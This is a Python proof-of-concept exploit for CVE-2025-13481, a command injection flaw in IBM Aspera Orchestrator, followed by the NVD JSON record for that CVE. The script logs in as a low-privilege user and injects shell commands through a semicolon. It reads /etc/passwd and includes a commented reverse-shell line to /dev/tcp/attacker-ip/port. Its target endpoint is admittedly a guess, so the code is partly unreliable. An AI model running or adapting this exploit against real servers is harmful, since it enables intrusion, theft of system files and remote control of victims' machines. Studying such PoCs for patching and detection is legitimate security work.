CVE-2025-13481

# CVE-2025-13481 PoC - IBM Aspera Orchestrator Command Injection # This PoC demonstrates the command injection vulnerability in IBM Aspera Orchestrator import requests import sys import base64 TARGET_URL = "https://target-server:8443" USERNAME = "low_privilege_user" PASSWORD = "user_password" def login(): """Authenticate to IBM Aspera Orchestrator""" session = requests.Session() login_url = f"{TARGET_URL}/api/login" payload = { "username": USERNAME, "password": PASSWORD } try: response = session.post(login_url, json=payload, verify=False, timeout=30) if response.status_code == 200: return session except Exception as e: print(f"Login failed: {e}") return None def exploit_command_injection(session, command): """Exploit the command injection vulnerability""" # This is a generic example - actual endpoint may vary exploit_url = f"{TARGET_URL}/api/system/execute" # Construct malicious payload with command injection # Using semicolon to chain commands injected_payload = f";{command}" payload = { "command": injected_payload, "args": [] } try: response = session.post(exploit_url, json=payload, verify=False, timeout=30) if response.status_code == 200: return response.json() except Exception as e: print(f"Exploit failed: {e}") return None def main(): print("[*] CVE-2025-13481 PoC - IBM Aspera Orchestrator Command Injection") print("[*] Target: IBM Aspera Orchestrator 4.0.0 - 4.1.0") # Step 1: Login with low privilege account print(f"\n[1] Authenticating as {USERNAME}...") session = login() if not session: print("[-] Authentication failed") sys.exit(1) print("[+] Authentication successful") # Step 2: Execute injected command (example: read /etc/passwd) print("\n[2] Injecting command to read /etc/passwd...") result = exploit_command_injection(session, "cat /etc/passwd") if result: print(f"[+] Command output: {result}") # Example: Reverse shell payload # exploit_command_injection(session, "bash -i >& /dev/tcp/attacker-ip/port 0>&1") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-13481", "sourceIdentifier": "[email protected]", "published": "2025-12-11T20:15:53.230", "lastModified": "2025-12-15T19:02:24.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Aspera Orchestrator 4.0.0 through 4.1.0 could allow an authenticated user to execute arbitrary commands with elevated privileges on the system due to improper validation of user supplied input."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:aspera_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.1.1", "matchCriteriaId": "ABABACFD-E349-45B4-980B-FD851738CFE6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7254434", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}